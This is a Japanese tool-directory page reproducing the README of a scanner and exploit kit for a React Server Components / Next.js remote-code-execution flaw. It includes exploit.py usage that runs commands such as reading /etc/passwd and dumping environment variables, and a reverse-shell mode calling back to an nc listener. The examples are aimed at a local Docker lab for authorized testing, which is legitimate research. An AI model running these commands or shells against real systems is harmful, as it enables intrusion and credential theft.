Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
react2shell-scanner-CVE-2025-55182 — React2shell-web-scanner | Kitploit
ツール/GitHubGitHub/security-phoenix-demo/react2shell-scanner-cve-2025-55182
侵害指標 (IOC) 管理脆弱性スキャナーエクスプロイトウェブアプリケーション悪用脅威インテリジェンスサブドメイン列挙学習と教育ペイロード開発ラボと実践

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
GitHubsecurity-phoenix-demo/react2shell-scanner-cve-2025-55182

react2shell-scanner-CVE-2025-55182

React2shell-web-scanner

リポジトリを見る
2129ヶ月前未レビュー

React2Shell エンタープライズスキャナー

CVE-2025-55182 および CVE-2025-66478 向けの高精度脆弱性スキャナー - React Server Components / Next.js におけるリモートコード実行(RCE)脆弱性

📖 詳細な技術分析、エクスプロイトの仕組み、IOC データについては、SECURITY-RESEARCH.md を参照してください


⚠️ 免責事項

このツールは、教育目的および許可を得たセキュリティテスト専用に提供されます。 コンピュータシステムへの不正アクセスは違法です。これらのツールは、自分が所有するシステム、またはテストするための明示的な書面による許可を得たシステムでのみ使用してください。作者は誤用に対するいかなる責任も負いません。


🚨 脆弱性の概要

CVE説明CVSS
CVE-2025-55182React Server Components 安全でない逆シリアライゼーション RCE9.8 Critical
CVE-2025-66478Next.js Server Actions RCE9.8 Critical

影響を受けるパッケージ:

  • react-server-dom-webpack: 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-turbopack: 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-parcel: 19.1.0, 19.1.1, 19.2.0

修正済みバージョン:

  • 19.0.1, 19.1.2, 19.2.1 (すべてのパッケージ)

✨ 特徴

  • マルチターゲット入力: 単一 URL、ホストファイル、CIDR レンジ、IP レンジ
  • サブドメイン列挙: サブドメインを自動検出
  • テクノロジーフィンガープリンティング: テスト前に Next.js を検出
  • セーフ検出モード: コード実行を伴わないサイドチャネル検出
  • RCE 検証: 算術ベースの概念実証(PoC)
  • IOC 相関: 既知の悪意あるインフラストラクチャとの照合
  • Phoenix Security 連携: 検出結果を Phoenix プラットフォームにアップロード
  • 並行スキャン: スケールに対応したマルチスレッド

📦 インストール

uv を使用する場合(推奨)

# No installation needed - uv handles dependencies
uv run react2shell-scanner -u https://example.com

pip を使用する場合

pip install requests tqdm dnspython
python3 react2shell-scanner -u https://example.com

🚀 使用方法

基本スキャン

# Single URL
python3 react2shell-scanner -u https://example.com

# Safe mode (no RCE execution)
python3 react2shell-scanner -u https://example.com --safe-check

# From host file
python3 react2shell-scanner -l targets.txt -t 50 -o results.json

# CIDR range
python3 react2shell-scanner --cidr 192.168.1.0/24 --ports 80,443,3000

# Multiple CIDR ranges
python3 react2shell-scanner --cidr 10.0.0.0/24 --cidr 172.16.0.0/24

高度なスキャン

# Subdomain enumeration
python3 react2shell-scanner -u example.com --enumerate-subdomains

# Custom subdomain wordlist
python3 react2shell-scanner -u example.com --enumerate-subdomains \
    --subdomain-wordlist "app,api,admin,portal,staging"

# Custom paths
python3 react2shell-scanner -u https://example.com \
    --path / --path /_next --path /api

# Skip fingerprinting (scan everything)
python3 react2shell-scanner -l targets.txt --skip-fingerprint --force-scan

# Verbose with SSL disabled
python3 react2shell-scanner -u https://example.com -k -v

Phoenix Security 連携

# Upload findings to Phoenix
python3 react2shell-scanner -l targets.txt \
    --upload-phoenix \
    --phoenix-config .phoenix.config

# Debug mode (save payloads)
python3 react2shell-scanner -l targets.txt \
    --upload-phoenix \
    --debug

# Upload all results (not just vulnerabilities)
python3 react2shell-scanner -l targets.txt \
    --upload-phoenix \
    --all-results

🔧 設定

Phoenix Security 設定

.phoenix.config を作成:

[phoenix]
client_id = your_client_id_here
client_secret = your_client_secret_here
api_base_url = https://api.demo.appsecphx.io
assessment_name = React2Shell Scanner - Web Vulnerabilities
import_type = new

または環境変数を使用:

export PHOENIX_CLIENT_ID=your_client_id
export PHOENIX_CLIENT_SECRET=your_client_secret
export PHOENIX_API_URL=https://api.demo.appsecphx.io
export PHOENIX_ASSESSMENT_NAME="React2Shell Scanner"

🧪 テストラボ

Docker ベースのテスト環境が含まれています。クイックリファレンスは Lab-instructions-sample.md を参照してください。

# Start lab
cd test-lab/lab
docker-compose up -d

# Services:
# - Vulnerable: http://localhost:3011
# - Patched:    http://localhost:3012

# Test vulnerable instance (safe evidence collection)
python3 react2shell-scanner -u http://localhost:3011 -o evidence.json -e

# Test patched instance  
python3 react2shell-scanner -u http://localhost:3012 -o evidence.json -e

# Run full demo
./test-and-demo.sh --full-demo

⚠️ 注: エクスプロイトコマンド(例: exploit.py -c "whoami")は実際の RCE を実行します。研究目的のため、ローカルの Docker コンテナでのみ使用してください。

💻 エクスプロイトツール (exploit.py)

脆弱なターゲット上でコマンドを実行します。Python 3.11+ が必要です

インストール

cd test-lab
pip3.11 install -r requirements.txt
# Or: pip3.11 install rich-click fake-useragent rich requests

コマンド実行例

# Basic command execution
python3.11 exploit.py -u http://localhost:3011 -c "whoami"
# Output: nextjs

python3.11 exploit.py -u http://localhost:3011 -c "id"
# Output: uid=1001(nextjs) gid=65533(nogroup) groups=65533(nogroup)

python3.11 exploit.py -u http://localhost:3011 -c "hostname"
# Output: 99e28775bf80 (container ID)

# System enumeration
python3.11 exploit.py -u http://localhost:3011 -c "uname -a"
python3.11 exploit.py -u http://localhost:3011 -c "cat /etc/passwd"
python3.11 exploit.py -u http://localhost:3011 -c "env | head -20"

# Application reconnaissance
python3.11 exploit.py -u http://localhost:3011 -c "pwd"
# Output: /app

python3.11 exploit.py -u http://localhost:3011 -c "ls -la"
python3.11 exploit.py -u http://localhost:3011 -c "cat package.json"
python3.11 exploit.py -u http://localhost:3011 -c "node --version"

# Network information
python3.11 exploit.py -u http://localhost:3011 -c "cat /etc/hosts"
python3.11 exploit.py -u http://localhost:3011 -c "netstat -an | head -20"

# Process enumeration
python3.11 exploit.py -u http://localhost:3011 -c "ps aux"

リバースシェル(高度)

# Get Docker network gateway
GATEWAY=$(docker network inspect lab_react-rsc-lab --format '{{range .IPAM.Config}}{{.Gateway}}{{end}}')

# Start listener (in another terminal)
nc -lvnp 4444

# Launch reverse shell
python3.11 exploit.py -u http://localhost:3011 -r -l $GATEWAY -p 4444 -P nc-mkfifo

# Available payload types: nc, nc-mkfifo, sh, bash, perl

エクスプロイトオプション

オプション説明
-u, --urlターゲット URL(必須)
-c, --cmd実行するコマンド
-r, --reverseリバースシェルモードを有効化
-l, --lhostリバースシェル用のリスナーホスト
-p, --lportリバースシェル用のリスナーポート
-P, --payloadペイロードタイプ: nc, nc-mkfifo, sh, bash, perl
--timeoutリクエストタイムアウト(デフォルト: 10秒)

📊 出力形式

コンソール出力

[VULNERABLE] https://vulnerable.example.com
    Status: 307
    Detection: rce_arithmetic_check
    
[IOC MATCH] 93.123.109.247
    IP 93.123.109.247 matches known malicious infrastructure
    
[NEXTJS] https://safe.example.com v15.0.0

[NOT VULN] https://other.example.com

JSON 出力

{
  "scan_time": "2025-12-08T10:00:00Z",
  "scanner": "React2Shell Scanner v2.0",
  "cves": ["CVE-2025-55182", "CVE-2025-66478"],
  "total_scanned": 100,
  "vulnerable_count": 3,
  "ioc_matches": 1,
  "results": [
    {
      "target": "https://vulnerable.example.com",
      "ip": "203.0.113.50",
      "fqdn": "vulnerable.example.com",
      "verdict": "VULNERABLE",
      "vulnerable": true,
      "nextjs_detected": true,
      "detection_method": "rce_arithmetic_check"
    }
  ]
}

🔍 IOC 相関

このスキャナーには、進行中の悪用キャンペーンで観測された既知の侵害指標(IOC)が含まれています:

  • payloads-exploits/iocs.csv に基づく 32 の悪意ある IP
  • payloads-exploits/weaponized-payloads に含まれる兵器化されたペイロード
  • payloads-exploits/iocs_patterns.csv に含まれるドメイン、URL、ファイルハッシュ、暗号通貨ウォレットなどの拡張 IOC

検出された IOC 一致は高重大度としてフラグ付けされます。

IOC ファイル

ファイル内容
iocs.csv地理位置情報データ付きの既知の悪意ある IP 32 件
iocs_patterns.csv拡張 IOC: C2 ドメイン、ドロッパー URL、マルウェアハッシュ、Monero ウォレット
weaponized-payloads実際の悪用で観測された実世界の攻撃ペイロード
exploit-2025-55182エクスプロイト用の生の HTTP リクエスト形式

🛡️ 検出方法

セーフサイドチャネルチェック (--safe-check)

  • エラーレスポンスを引き起こす不正なペイロードを送信
  • ターゲット上でコードは実行されない
  • ターゲットに脆弱な逆シリアライゼーションがあるかどうかを検出
  • パッシブな偵察に推奨

RCE 算術チェック(デフォルト)

  • echo $((41*271)) を実行するペイロードを送信
  • レスポンスに計算結果(11111)が含まれることを検証
  • 実際のコード実行能力を確認
  • 許可を得たターゲットでのみ使用

📁 プロジェクト構成

ツールをダウンロード